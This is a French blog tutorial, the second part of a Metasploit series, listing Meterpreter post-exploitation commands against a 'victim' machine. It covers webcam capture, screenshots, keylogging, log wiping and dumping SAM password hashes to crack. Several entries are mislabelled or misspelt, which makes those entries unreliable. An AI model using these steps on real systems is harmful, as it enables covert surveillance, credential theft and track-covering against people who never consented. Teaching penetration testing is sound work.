Metasploit : Partie 2 – Meterpreter

Maintenant que nous avons réussi a obtenir une connexion sur notre machine cible nous allons voir ce que l’on peux faire avec le meterpreter.

Si toute fois vous n’arrivez pas a avoir accès au meterpreter je vous invite a lire l’article précédant. Si j’oublie certaines commandes faites « help ».

Commandes de bases.

  • Se déplacer dans les dossiers: cd, ls 
  • Connaitre son emplacement : getlwd (Machine de l’attaquant) getwd (Machine victime)
  • Supprimer des fichiers/dossiers : fichiers => rm <fichier> dossier => rmdir <dossier>
  • Trouver un fichier sur l’ordinateur : find -f <fichier>
  • Créer un dossier : mkdir <nomdudossier>
  • Envoyer des fichiers a la cible : upload <nomdufichier>
  • Lire un fichier : cat <fichier>
  • Editer un fichier : edit <fichier>
  • Télécharger un fichier : download <fichier>

Commandes Réseau.

  • Lister les interfaces réseaux : ifconfig/ipconfig
  • Rediriger un port : portfwd <port> <options>
  • Connaitre les routes : route

Commandes Système.

  • Obtenir des infos sur la machine : sysinfo
  • Obtenir un shell : shell
  • Connaitre le Process ID : getpid
  • Connaitre la liste des processus: ps 
  • Arrêter un processus : kill <PID>
  • Connaitre l’user ID : getuid
  • Connaitre la liste des privilèges de l’utilisateur : getprivs
  • Vider les fichiers de logs: clearv
  • Toucher au registre de la cible : reg <options>
  • Élever ses privilèges : getprivs
  • Éteindre l’ordinateur : shutdown
  • Redémarrer l’ordinateur : reboot

Commandes Espion.

  • Lister les webcams : webcam_list
  • Prendre une photo avec la webcam : webcam_snap <Webcam>
  • Connaitre les bureaux accessibles : enumdesktops 
  • Connaitre l’emplacement du meterpreter sur la machine : getdesktop
  • Greffer le meterpreter sur un bureau : setdesktop <nom>
  • Prendre un screenshot de l’ecran : screenshoot
  • Connaitre les accès a un fichier : timestomp <options> <fichier>

Keylogger :

On commence par lister les processus avec ps.
On se greffe ensuite sur le processus en question : migrate <pid>
On démare ensuite le keylogger : keyscan_start
Pour afficher ensuite ce qui est tapé par la victime on fait : keyscan_dump
Ce qui nous affiche ce qui a été tapé depuis que l’on scanne le début du scan.
Pour arrêter on tape : keyscan_stop

Voir les contenus du fichier SAM

Rien de très compliqué pour cette dernière commande.
Celle ci nous donnera la liste des hash que vous pourrez ensuite craquer avec Cain ou John.
Pour obtenir cette liste on tape juste : hashdump.
Voila pour cette partie destiné au meterpreter. J’espère avoir été le plus complet possible et ne pas avoir oublié trop de commandes. Si c’est le cas n’hesitez pas a commenter que je rectifie ca !

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *